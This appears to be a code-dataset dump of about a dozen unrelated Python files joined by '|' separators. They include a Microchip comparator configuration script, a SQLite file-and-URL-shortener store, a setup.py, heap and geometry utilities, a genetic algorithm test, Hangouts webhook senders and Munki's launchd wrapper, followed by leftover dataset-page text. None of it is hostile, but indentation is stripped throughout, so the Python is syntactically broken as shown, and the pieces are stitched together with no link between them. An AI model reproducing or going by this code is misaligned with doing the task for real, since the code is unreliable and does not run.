cmpSym_Menu = cmpComponent.createMenuSymbol("CMP" + str(index) + "_MENU", None)
cmpSym_Menu.setLabel("Comparator " + str(index))
#Clock enable
Database.setSymbolValue("core", "CMP" + str(index) + "_CLOCK_ENABLE", True, 1)
#Positive input of Comparator
cmp1CREF_names = []
_get_bitfield_names(cmpValGrp_CM1CON_CREF, cmp1CREF_names)
cmpSym_CMxCON_CREF.append(index)
cmpSym_CMxCON_CREF[index - 1] = cmpComponent.createKeyValueSetSymbol("CMP_CM" + str(index) + "CON_CREF", cmpSym_Menu)
cmpSym_CMxCON_CREF[index - 1].setLabel(cmpBitFld_CM1CON_CREF.getAttribute("caption"))
cmpSym_CMxCON_CREF[index - 1].setDefaultValue(0)
cmpSym_CMxCON_CREF[index - 1].setOutputMode("Value")
cmpSym_CMxCON_CREF[index - 1].setDisplayMode("Description")
for ii in cmp1CREF_names:
cmpSym_CMxCON_CREF[index - 1].addKey( ii['desc'], ii['value'], ii['key'] )
#Negative input of Comparator
cmp1CCH_names = []
_get_bitfield_names(cmpValGrp_CM1CON_CCH, cmp1CCH_names)
cmpSym_CMxCON_CCH.append(index)
cmpSym_CMxCON_CCH[index - 1] = cmpComponent.createKeyValueSetSymbol("CMP_CM" + str(index) + "CON_CCH", cmpSym_Menu)
cmpSym_CMxCON_CCH[index - 1].setLabel(cmpBitFld_CM1CON_CCH.getAttribute("caption"))
cmpSym_CMxCON_CCH[index - 1].setDefaultValue(0)
cmpSym_CMxCON_CCH[index - 1].setOutputMode("Value")
cmpSym_CMxCON_CCH[index - 1].setDisplayMode("Description")
for ii in cmp1CCH_names:
cmpSym_CMxCON_CCH[index - 1].addKey( ii['desc'], ii['value'], ii['key'] )
#Edge selection for interrupt generation
cmp1EVPOL_names = []
_get_bitfield_names(cmpValGrp_CM1CON_EVPOL, cmp1EVPOL_names)
cmpSym_CMxCON_EVPOL.append(index)
cmpSym_CMxCON_EVPOL[index - 1] = cmpComponent.createKeyValueSetSymbol("CMP_CM" + str(index) + "CON_EVPOL", cmpSym_Menu)
cmpSym_CMxCON_EVPOL[index - 1].setLabel(cmpBitFld_CM1CON_EVPOL.getAttribute("caption"))
cmpSym_CMxCON_EVPOL[index - 1].setDefaultValue(0)
cmpSym_CMxCON_EVPOL[index - 1].setOutputMode("Value")
cmpSym_CMxCON_EVPOL[index - 1].setDisplayMode("Description")
for ii in cmp1EVPOL_names:
cmpSym_CMxCON_EVPOL[index - 1].addKey( ii['desc'], ii['value'], ii['key'] )
#Comparator output invert
cmpSym_CMxCON_CPOL.append(index)
cmpSym_CMxCON_CPOL[index - 1] = cmpComponent.createBooleanSymbol("CMP_CM" + str(index) + "CON_CPOL", cmpSym_Menu)
cmpSym_CMxCON_CPOL[index - 1].setLabel(cmpBitFld_CM1CON_CPOL.getAttribute("caption"))
#Comparator output on pin
cmpSym_CMxCON_COE.append(index)
cmpSym_CMxCON_COE[index - 1] = cmpComponent.createBooleanSymbol("CMP_CM" + str(index) + "CON_COE", cmpSym_Menu)
cmpSym_CMxCON_COE[index - 1].setLabel(cmpBitFld_CM1CON_COE.getAttribute("caption"))
#Collecting user input to combine into CMPxCON register
#CMPxCON is updated every time a user selection changes
cmpSym_CMP1CON = cmpComponent.createHexSymbol("CM" + str(index) + "CON_VALUE", None)
cmpSym_CMP1CON.setDefaultValue(0)
cmpSym_CMP1CON.setVisible(False)
cmpSym_CMP1CON.setDependencies(combineValues, ["CMP_CM" + str(index) + "CON_CREF", "CMP_CM" + str(index) + "CON_CCH", "CMP_CM" + str(index) + "CON_EVPOL", "CMP_CM" + str(index) + "CON_CPOL", "CMP_CM" + str(index) + "CON_COE"])
#Calculate the proper interrupt registers using IRQ#
cmpxIrq = "COMPARATOR_" + str(index)
InterruptVector.append(cmpxIrq + "_INTERRUPT_ENABLE")
InterruptHandler.append(cmpxIrq + "_INTERRUPT_HANDLER")
InterruptHandlerLock.append(cmpxIrq + "_INTERRUPT_HANDLER_LOCK")
InterruptVectorUpdate.append("core." + cmpxIrq + "_INTERRUPT_ENABLE_UPDATE")
cmpxIrq_index = int(getIRQIndex(cmpxIrq))
if cmpxIrq_index == -1:
cmpxIrq_index = int(getVectorIndex(cmpxIrq))
cmpxEnblRegName = _get_enblReg_parms(cmpxIrq_index)
cmpxStatRegName = _get_statReg_parms(cmpxIrq_index)
#CMPx IEC REG
cmpxIEC = cmpComponent.createStringSymbol("CMP" + str(index) + "_IEC_REG", None)
cmpxIEC.setDefaultValue(cmpxEnblRegName)
cmpxIEC.setVisible(False)
#CMPx IFS REG
cmpxIFS = cmpComponent.createStringSymbol("CMP" + str(index) + "_IFS_REG", None)
cmpxIFS.setDefaultValue(cmpxStatRegName)
cmpxIFS.setVisible(False)
############################################################################
#### Dependency ####
############################################################################
# EVIC Dynamic settings
# Dependency Status
cmpSymIntxEnComment = cmpComponent.createCommentSymbol("CMP" + str(index) + "_INTERRUPT_ENABLE_COMMENT", cmpSym_Menu)
cmpSymIntxEnComment.setVisible(False)
cmpSymIntxEnComment.setLabel("Warning!!! Comparator " + str(index) + " Interrupt is Disabled in Interrupt Manager")
cmpSymIntxEnComment.setDependencies(updateCMPxInterruptData, ["CMP_CM" + str(index) + "CON_EVPOL", InterruptVectorUpdate[index - 1]])
# Clock Warning status
cmpSym_ClkxEnComment = cmpComponent.createCommentSymbol("CMP" + str(index) + "_CLOCK_ENABLE_COMMENT", cmpSym_Menu)
cmpSym_ClkxEnComment.setLabel("Warning!!! Comparator " + str(index) + " Peripheral Clock is Disabled in Clock Manager")
cmpSym_ClkxEnComment.setVisible(False)
cmpSym_ClkxEnComment.setDependencies(updateCMPxClockWarningStatus, ["core.CMP" + str(index) + "_CLOCK_ENABLE"])
cmpSym_Count = cmpComponent.createIntegerSymbol("CMP_COUNT", cmpSym_Menu)
cmpSym_Count.setDefaultValue(index)
cmpSym_Count.setVisible(False)
############################################################################
#### Code Generation ####
############################################################################
configName = Variables.get("__CONFIGURATION_NAME")
cmpHeader1File = cmpComponent.createFileSymbol("CMP_HEADER1", None)
cmpHeader1File.setMarkup(True)
cmpHeader1File.setSourcePath("../peripheral/cmp_00866/templates/plib_cmp.h.ftl")
cmpHeader1File.setOutputName("plib_" + cmpInstanceName.getValue().lower() + ".h")
cmpHeader1File.setDestPath("peripheral/cmp/")
cmpHeader1File.setProjectPath("config/" + configName + "/peripheral/cmp/")
cmpHeader1File.setType("HEADER")
cmpHeader1File.setOverwrite(True)
cmpSource1File = cmpComponent.createFileSymbol("CMP_SOURCE1", None)
cmpSource1File.setMarkup(True)
cmpSource1File.setSourcePath("../peripheral/cmp_00866/templates/plib_cmp.c.ftl")
cmpSource1File.setOutputName("plib_" + cmpInstanceName.getValue().lower() + ".c")
cmpSource1File.setDestPath("peripheral/cmp/")
cmpSource1File.setProjectPath("config/" + configName + "/peripheral/cmp/")
cmpSource1File.setType("SOURCE")
cmpSource1File.setOverwrite(True)
cmpSystemInitFile = cmpComponent.createFileSymbol("CMP_INIT", None)
cmpSystemInitFile.setType("STRING")
cmpSystemInitFile.setOutputName("core.LIST_SYSTEM_INIT_C_SYS_INITIALIZE_PERIPHERALS")
cmpSystemInitFile.setSourcePath("../peripheral/cmp_00866/templates/system/initialization.c.ftl")
cmpSystemInitFile.setMarkup(True)
cmpSystemDefFile = cmpComponent.createFileSymbol("CMP_DEF", None)
cmpSystemDefFile.setType("STRING")
cmpSystemDefFile.setOutputName("core.LIST_SYSTEM_DEFINITIONS_H_INCLUDES")
cmpSystemDefFile.setSourcePath("../peripheral/cmp_00866/templates/system/definitions.h.ftl")
cmpSystemDefFile.setMarkup(True)
|
import attr
@attr.dataclass
class License:
features: str
nlevel: int
software_id: str
|
from .file_record import File
import sqlite3
class Database:
def __init__(self):
self.conn = {}
self.queries = {}
def cursor(self):
return self.conn.cursor()
def init(self):
self.conn = sqlite3.connect('db_files/prv.db', check_same_thread=False)
self.queries = {
"Find_file_hash": "SELECT * FROM files WHERE hash = ? LIMIT 1;",
"Find_file_url": "SELECT * FROM files WHERE url = ? LIMIT 1;",
"Find_url_hash": "SELECT * FROM shortened WHERE hash = ? LIMIT 1;",
"Find_url_short": "SELECT * FROM shortened WHERE short = ? LIMIT 1;",
"Get_user_files": "SELECT * FROM files WHERE user = ?",
"Get_user_short": "SELECT * FROM shortened WHERE user = ?;",
"Insert_file": "INSERT INTO files VALUES (?, ?, ?, ?, ?);",
"Insert_short": "INSERT INTO shortened VALUES (?, ?, ?, ?);",
}
database = Database()
database.init()
def get_user_files(userID):
cursor = database.cursor()
cursor.execute(database.queries["Get_user_files"], (userID,))
database.conn.commit()
files = cursor.fetchall()
cursor.execute(database.queries["Get_user_short"], (userID,))
database.conn.commit()
shorts = cursor.fetchall()
cursor.close()
return files, shorts
def find(where, what):
cursor = database.cursor()
cursor.execute(database.queries['Find_' + where], (what,))
database.conn.commit()
result = cursor.fetchone()
cursor.close()
return result
def add_short(short, original, hash, userID):
cursor = database.cursor()
cursor.execute(database.queries['Insert_short'], (short, original, hash, userID))
database.conn.commit()
result = cursor.lastrowid
cursor.close()
return result
def add_file(fileRecord: File, userID):
cursor = database.cursor()
cursor.execute(database.queries['Insert_file'], (fileRecord.hash,
fileRecord.realName,
fileRecord.extension,
fileRecord.url,
userID))
database.conn.commit()
result = cursor.lastrowid
cursor.close()
return result
|
import setuptools
from distutils.core import setup
with open("README.md", "r") as fh:
LONG_DESCRIPTION = fh.read()
def setup_package():
metadata = dict(name='deepstack',
packages=['deepstack'],
maintainer='Julio Borges',
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
description='DeepStack: Ensembles for Deep Learning',
license='MIT',
url='https://github.com/jcborges/DeepStack',
download_url='https://github.com/jcborges/DeepStack/archive/v_0.0.9.tar.gz',
version='0.0.9',
install_requires=[
'numpy>=1.16.4',
'keras>=2.2.5',
'tensorflow>=1.14.0',
'scikit-learn>=0.21.2'
],
)
setup(**metadata)
if __name__ == "__main__":
setup_package()
|
from module import *
def genToC(data, printLev, lastOneLine, lev, prevRef):
treeDepth = getDepth(data)
#print(treeDepth)
# return if printLev is activated,
# and lev exceeded it
if printLev != -1 and lev > printLev:
return
# if not dict type return
if not ( isinstance(data, dict) ):
return
# case nested lists
if (treeDepth > 1 or not lastOneLine):
# get key and values out of dictionary
for key, val in data.items():
# parse strings and print
keyRef = convKeyRef(key, prevRef)
header = parseToCitem(key, keyRef)
print(" "*lev + "- " + header )
# recursively call beneath items
genToC(val, printLev, lastOneLine, lev+1, keyRef+'_')
# case only one list is remaining, and
# printing in one line is activated
elif (treeDepth == 1 and lastOneLine):
finalItem = " "*lev + "- "
for key, val in data.items():
keyRef = convKeyRef(key, prevRef)
header = parseToCitem(key, keyRef)
finalItem = finalItem + header + " | "
# remove final additional " | "
finalItem = finalItem[:-3]
print(finalItem)
# no recursive call as this is a leaf list
###
import sys, json
# user's input
fileName = sys.argv[1]
printLev = (int)(sys.argv[2]) # str converted to int
lastOneLine = True if sys.argv[3] == '1' else False # str converted to bool
# open json file
f = open(fileName)
# convert to dict
data = json.load(f)
# print table of contents
genToC(data, printLev, lastOneLine, 0, '')
# close file
f.close()
|
from heapq import heappop, heappush, heappushpop, heapify, _heapify_max, _heappushpop_max, _siftdown_max, _siftup_max
from collections import Iterable
from math import cos, ceil, pi, sin
from shapely.geometry import Polygon, Point
def circle(o, r, resolution=None):
if r <= 0:
raise ValueError("r must be a number greater than 0")
if resolution:
return o.buffer(r, int(ceil(pi * r * 2 / resolution / 4)))
else:
return o.buffer(r, 32)
def sector(o, r, angles, resolution=None):
c = circle(o, r, resolution)
if abs(angles[0] - angles[1]) >= pi:
raise ValueError('abs(angles[0] - angles[1]) must be less than Pi')
l = r / cos(abs(angles[0] - angles[1]) / 2)
triangle = Polygon(
[(o.x, o.y), (o.x + cos(angles[0]) * l, o.y + sin(angles[0]) * l),
(o.x + cos(angles[1]) * l, o.y + sin(angles[1]) * l)])
s = triangle.intersection(c)
s.o = o
s.r = r
s.angles = angles
return s
def partitions(origin, space, n):
bounds = space.bounds
r = Point((bounds[0], bounds[1])).distance(Point((bounds[2], bounds[3])))
return [sector(origin, r, [2 * pi / n * i, 2 * pi / n * (i + 1)]) for i in range(n)]
def heappush_max(heap, item):
heap.append(item)
_siftdown_max(heap, 0, len(heap) - 1)
def heappop_max(heap):
last = heap.pop()
if heap:
return_item = heap[0]
heap[0] = last
_siftup_max(heap, 0)
else:
return_item = last
return return_item
class MinHeap(Iterable):
def __init__(self):
self.items = []
def pop(self):
return heappop(self.items)
def push(self, item):
heappush(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
smallest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class MaxHeap(Iterable):
def __init__(self):
self.items = []
def pop(self):
return heappop_max(self.items)
def push(self, item):
heappush_max(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
largest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class NSmallestHolder:
def __init__(self, n):
self.items = []
self.n = n
def push(self, item):
if len(self.items) < self.n:
self.items.append(item)
if len(self.items) == self.n:
_heapify_max(self.items)
else:
_heappushpop_max(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
largest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class NLargestHolder:
def __init__(self, n):
self.items = []
self.n = n
def push(self, item):
if len(self.items) < self.n:
self.items.append(item)
if len(self.items) == self.n:
heapify(self.items)
else:
heappushpop(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
smallest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
def plot_points(ax, data, color, size, label):
x = [geom.x for id, geom in data]
y = [geom.y for id, geom in data]
ax.plot(x, y, '.', markersize=size, color=color, label=label)
def plot_stars(ax, data, color, size, label):
x = [geom.x for id, geom in data]
y = [geom.y for id, geom in data]
ax.plot(x, y, '*', markersize=size, color=color, label=label)
|
from unittest import TestCase
from NiaPy.algorithms.basic import GeneticAlgorithm
class MyBenchmark(object):
def __init__(self):
self.Lower = -5.12
self.Upper = 5.12
@classmethod
def function(cls):
def evaluate(D, sol):
val = 0.0
for i in range(D):
val = val + sol[i] * sol[i]
return val
return evaluate
class GATestCase(TestCase):
def setUp(self):
self.ga_custom = GeneticAlgorithm(10, 40, 1000, 4, 0.05, 0.4, MyBenchmark())
self.ga_griewank = GeneticAlgorithm(10, 40, 1000, 4, 0.05, 0.4, 'griewank')
def test_custom_works_fine(self):
self.assertTrue(self.ga_custom.run())
def test_griewank_works_fine(self):
self.assertTrue(self.ga_griewank.run())
|
from json import dumps
from httplib2 import Http
import config
def robot(content):
"""Hangouts Chat incoming webhook quickstart."""
url = config.robot["tsaitung"]
bot_message = {
'text' : content }
message_headers = {'Content-Type': 'application/json; charset=UTF-8'}
http_obj = Http()
response = http_obj.request(
uri=url,
method='POST',
headers=message_headers,
body=dumps(bot_message),
)
def robot_kgi(content):
"""Hangouts Chat incoming webhook quickstart."""
url = config.robot["KGI"]
bot_message = {
'text' : content }
message_headers = {'Content-Type': 'application/json; charset=UTF-8'}
http_obj = Http()
response = http_obj.request(
uri=url,
method='POST',
headers=message_headers,
body=dumps(bot_message),
)
|
import streamlink
from flask import jsonify
class decode:
pass
|
from pathlib import Path
from gi.repository import GLib, Gtk
from gaphor.abc import Service
from gaphor.core import event_handler
from gaphor.event import ModelLoaded, ModelSaved
from gaphor.ui import APPLICATION_ID
class RecentFiles(Service):
def __init__(self, event_manager, recent_manager=None):
self.event_manager = event_manager
self.recent_manager = recent_manager or Gtk.RecentManager.get_default()
self.event_manager.subscribe(self._on_filename_changed)
def shutdown(self):
self.event_manager.unsubscribe(self._on_filename_changed)
@event_handler(ModelLoaded, ModelSaved)
def _on_filename_changed(self, event):
filename = event.filename
if not filename:
return
uri = GLib.filename_to_uri(str(Path(filename).absolute()))
# Re-add, to ensure it's at the top of the list
self.remove(uri)
self.add(uri)
def add(self, uri):
meta = Gtk.RecentData()
meta.app_name = APPLICATION_ID
meta.app_exec = f"{GLib.get_prgname()} %u"
meta.mime_type = "application/x-gaphor"
self.recent_manager.add_full(uri, meta)
def remove(self, uri):
# From: https://gitlab.gnome.org/GNOME/pitivi/-/blob/58b5e3b6/pitivi/application.py#L271
try:
self.recent_manager.remove_item(uri)
except GLib.Error as e:
if e.domain != "gtk-recent-manager-error-quark":
raise e
|
#!/usr/bin/python
# encoding: utf-8
#
# Copyright 2011-2014 Greg Neagle.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
launchd.py
Created by Greg Neagle on 2011-07-22.
A wrapper for using launchd to run a process as root outside of munki's
process space. Needed to properly run /usr/sbin/softwareupdate, for example.
"""
import os
import subprocess
import time
import uuid
import munkicommon
import FoundationPlist
class LaunchdJobException(Exception):
'''Exception for launchctl errors and other errors from
this module.'''
pass
class Job(object):
'''launchd job object'''
def __init__(self, cmd, environment_vars=None):
tmpdir = munkicommon.tmpdir()
labelprefix = 'com.googlecode.munki.'
# create a unique id for this job
jobid = str(uuid.uuid1())
self.label = labelprefix + jobid
self.stdout_path = os.path.join(tmpdir, self.label + '.stdout')
self.stderr_path = os.path.join(tmpdir, self.label + '.stderr')
self.plist_path = os.path.join(tmpdir, self.label + '.plist')
self.stdout = None
self.stderr = None
self.plist = {}
self.plist['Label'] = self.label
self.plist['ProgramArguments'] = cmd
self.plist['StandardOutPath'] = self.stdout_path
self.plist['StandardErrorPath'] = self.stderr_path
if environment_vars:
self.plist['EnvironmentVariables'] = environment_vars
# write out launchd plist
FoundationPlist.writePlist(self.plist, self.plist_path)
# set owner, group and mode to those required
# by launchd
os.chown(self.plist_path, 0, 0)
os.chmod(self.plist_path, int('644', 8))
launchctl_cmd = ['/bin/launchctl', 'load', self.plist_path]
proc = subprocess.Popen(launchctl_cmd, shell=False, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
err = proc.communicate()[1]
if proc.returncode:
raise LaunchdJobException(err)
def __del__(self):
'''Attempt to clean up'''
if self.plist:
launchctl_cmd = ['/bin/launchctl', 'unload', self.plist_path]
dummy_result = subprocess.call(launchctl_cmd)
try:
self.stdout.close()
self.stderr.close()
except AttributeError:
pass
try:
os.unlink(self.plist_path)
os.unlink(self.stdout_path)
os.unlink(self.stderr_path)
except (OSError, IOError):
pass
def start(self):
'''Start the launchd job'''
launchctl_cmd = ['/bin/launchctl', 'start', self.label]
proc = subprocess.Popen(launchctl_cmd, shell=False, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
err = proc.communicate()[1]
if proc.returncode:
raise LaunchdJobException(err)
else:
if (not os.path.exists(self.stdout_path) or
not os.path.exists(self.stderr_path)):
# wait a second for the stdout/stderr files
# to be created by launchd
time.sleep(1)
try:
# open the stdout and stderr output files and
# store their file descriptors for use
self.stdout = open(self.stdout_path, 'r')
self.stderr = open(self.stderr_path, 'r')
except (OSError, IOError), err:
raise LaunchdJobException(err)
def stop(self):
'''Stop the launchd job'''
launchctl_cmd = ['/bin/launchctl', 'stop', self.label]
proc = subprocess.Popen(launchctl_cmd, shell=False, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
err = proc.communicate()[1]
if proc.returncode:
raise LaunchdJobException(err)
def info(self):
'''Get info about the launchd job. Returns a dictionary.'''
info = {'state': 'unknown',
'PID': None,
'LastExitStatus': None}
launchctl_cmd = ['/bin/launchctl', 'list']
proc = subprocess.Popen(launchctl_cmd, shell=False, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = proc.communicate()[0]
if proc.returncode or not output:
return info
else:
lines = str(output).splitlines()
# search launchctl list output for our job label
job_lines = [item for item in lines
if item.endswith('\t' + self.label)]
if len(job_lines) != 1:
# unexpected number of lines matched our label
return info
job_info = job_lines[0].split('\t')
if len(job_info) != 3:
# unexpected number of fields in the line
return info
if job_info[0] == '-':
info['PID'] = None
info['state'] = 'stopped'
else:
info['PID'] = int(job_info[0])
info['state'] = 'running'
if job_info[1] == '-':
info['LastExitStatus'] = None
else:
info['LastExitStatus'] = int(job_info[1])
return info
def returncode(self):
'''Returns the process exit code, if the job has exited; otherwise,
returns None'''
info = self.info()
if info['state'] == 'stopped':
return info['LastExitStatus']
else:
return None
def main():
'''placeholder'''
pass
if __name__ == '__main__':
main()
|
import psutil
percpu = psutil.cpu_percent(interval=None, percpu=True)
for i in range(len(percpu)):
print(i+1,"-" ,percpu[i])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.